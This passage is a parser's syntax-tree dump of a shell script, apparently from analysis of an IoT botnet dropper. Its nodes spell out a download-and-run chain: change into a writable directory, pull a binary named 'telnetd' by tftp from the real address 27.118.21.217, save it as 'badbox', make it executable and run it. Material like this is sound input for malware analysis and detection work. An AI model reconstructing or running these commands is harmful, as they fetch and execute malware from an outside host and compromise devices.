  OperatorNode(lineno=15, op=';', pos=(1485, 1486)),
  CommandNode(lineno=15, pos=(1486, 1494), parts=[
    WordNode(lineno=15, pos=(1486, 1494), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1495, 1622), parts=[
  CommandNode(lineno=16, pos=(1495, 1502), parts=[
    WordNode(lineno=16, pos=(1495, 1497), word='cd'),
    WordNode(lineno=16, pos=(1498, 1502), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1503, 1505)),
  CommandNode(lineno=16, pos=(1506, 1517), parts=[
    WordNode(lineno=16, pos=(1506, 1508), word='cd'),
    WordNode(lineno=16, pos=(1509, 1517), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1518, 1520)),
  CommandNode(lineno=16, pos=(1521, 1528), parts=[
    WordNode(lineno=16, pos=(1521, 1523), word='cd'),
    WordNode(lineno=16, pos=(1524, 1528), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1529, 1531)),
  CommandNode(lineno=16, pos=(1532, 1540), parts=[
    WordNode(lineno=16, pos=(1532, 1534), word='cd'),
    WordNode(lineno=16, pos=(1535, 1540), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1541, 1543)),
  CommandNode(lineno=16, pos=(1544, 1548), parts=[
    WordNode(lineno=16, pos=(1544, 1546), word='cd'),
    WordNode(lineno=16, pos=(1547, 1548), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1548, 1549)),
  CommandNode(lineno=16, pos=(1550, 1582), parts=[
    WordNode(lineno=16, pos=(1550, 1554), word='tftp'),
    WordNode(lineno=16, pos=(1555, 1557), word='-r'),
    WordNode(lineno=16, pos=(1558, 1565), word='telnetd'),
    WordNode(lineno=16, pos=(1566, 1568), word='-g'),
    WordNode(lineno=16, pos=(1569, 1582), word='27.118.21.217'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1582, 1583)),
  CommandNode(lineno=16, pos=(1583, 1602), parts=[
    WordNode(lineno=16, pos=(1583, 1586), word='cat'),
    WordNode(lineno=16, pos=(1587, 1594), word='telnetd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1596, 1602), word='badbox'), pos=(1595, 1602), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1602, 1603)),
  CommandNode(lineno=16, pos=(1603, 1613), parts=[
    WordNode(lineno=16, pos=(1603, 1608), word='chmod'),
    WordNode(lineno=16, pos=(1609, 1611), word='+x'),
    WordNode(lineno=16, pos=(1612, 1613), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1613, 1614)),
  CommandNode(lineno=16, pos=(1614, 1622), parts=[
    WordNode(lineno=16, pos=(1614, 1622), word='./badbox'),
  ]),
])
